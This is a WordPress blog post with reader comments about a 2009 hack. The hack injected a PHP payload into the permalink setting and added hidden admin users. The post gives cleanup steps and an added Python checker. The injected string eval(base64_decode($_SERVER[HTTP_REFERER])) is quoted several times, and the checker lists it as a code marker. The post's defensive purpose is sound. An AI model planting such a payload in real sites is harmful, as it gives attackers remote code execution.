I checked my blog and the URLs looked malformed, with the following structure: http://www.whoisandrewwee.com/2009/09/03/unlocking-unconventional-traffic-sources-for-affiliate-campaigns/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929
If you notice something similar or weird with your WordPress blog, you might want to take the following steps:
- Check the “users” tab from the WP admin interface
- Remove any unfamiliar users, especially those marked as “administrator”
- To prevent users from registering, I’d go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)
- Check the permissions on all of WordPress’ PHP scripts and remove global “execute” privileges
Once you’ve secured the perimeter, look at the “Settings” and “permalinks” tab.
If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929”, you’d want to clear that, and replace it with your original permalink structure, or look it up on the WordPress codex.
You can also check out this other blog post for more details.
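An added example, not from the original post or from WordPress itself: a Python check for the permalink value described above. It assumes you have copied the current value out of the permalinks tab; the function name, the tag list and the sample strings are this example's own, and the injected sample is rebuilt from the string quoted in the post.

```python
import re
from urllib.parse import unquote

# Structure tags documented for WordPress permalinks (assumed complete here).
KNOWN_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
              "post_id", "postname", "category", "author"}
TAG_RE = re.compile(r"%([a-z_]+)%")
# PHP fragments that appear in the injected value quoted in the post.
CODE_MARKERS = ("eval(", "base64_decode", "$_SERVER", "${")
UNSAFE_CHAR = re.compile(r"[^A-Za-z0-9_./-]")

# Constructed samples: a normal date-based structure, and the same structure
# with the suffix quoted in the post appended.
SAMPLE_CLEAN = "/%year%/%monthnum%/%day%/%postname%/"
SAMPLE_INJECTED = (SAMPLE_CLEAN + "%&(%7B$%7Beval(base64_decode("
                   "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")


def audit_permalink(structure):
    """Return a list of findings; an empty list means the value looks clean."""
    findings = []

    def strip_tag(match):
        if match.group(1) not in KNOWN_TAGS:
            findings.append("unknown tag %" + match.group(1) + "%")
        return ""

    # Remove tag-shaped tokens before percent-decoding: unquote() would read
    # the "%da" in "%day%" or the "%ca" in "%category%" as an escape.
    rest = unquote(TAG_RE.sub(strip_tag, structure))
    for marker in CODE_MARKERS:
        if marker in rest:
            findings.append("code marker " + marker)
    bad = sorted(set(UNSAFE_CHAR.findall(rest)))
    if bad:
        findings.append("unexpected characters " + "".join(bad))
    return findings


if __name__ == "__main__":
    for value in (SAMPLE_CLEAN, SAMPLE_INJECTED):
        print(audit_permalink(value) or "clean", "<-", value)
```

Any finding means the value should be cleared and reset to the original structure, as the post describes.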
Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.
UPDATE: Matt Mullenweg from the WordPress development team has posted about the security issues if you’re using an older version of WordPress. Here’s a WP support forum write-up about what might be happening.
You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.
We got it, too. Is this a world wide problem? I googled the change script and it seems a few similar problems have popped out recently.
Thanks for this post – we’ve seen it three times today, not sure what versions were running.
Thank you, it helped me tonight !! 🙂
Hi there
Many thanks for this information, I was at my wits’ end trying to resolve this lol, I think mine occurred because of installing the seo plugin pack, but doing what you said on this post worked fine!
Woc
They got me. Thanks for the info on how to clean it up. Wasn’t as cut and dried as you made it sound… had some trouble with my htaccess file. But it’s all good now!
Thanks so much Andrew, my blog was also similarly affected and I’ve followed your instructions to fix the issue. I’d have been completely stumped without this post.
Wonder if they’re targeting online marketers, the rotters?!
Andrew – a colleague also affected has just told me that most people affected will also have had a new admin inserted directly into their SQL database that doesn’t show up in WordPress interface.
I found this had been placed into my SQL db, it has obviously been stored for later foul internet deeds to be performed…
Hi Kirsty,
Thanks for that. I’ll drop a note to my server admin.
For those who’re using fantastico/cPanel, it should be an easy fix from the “mySQL database” or “phpMyAdmin” consoles.
Lots more going on beneath the surface! Permalinks and hidden admin users! This blog post worked for me to clean house: http://blog.nachotech.com/?p=125
I also renamed my xmlrpc.php and wp-register.php files as a stop-gap solution. It seems 2.8.4 blogs are safe so far. I am guessing 2.8.5 will be out ASAP to correct this if 2.8.4 doesn’t.
This post is very good for me. I can get many tips and tricks on this blog. Thanks for your information, my friend! This is my first time visiting your blog.
Thanks for your post! I just had the problem. 🙁
Thanx a lot! Really works!
This helps! Thank you! I was trying to figure out these problems the other day!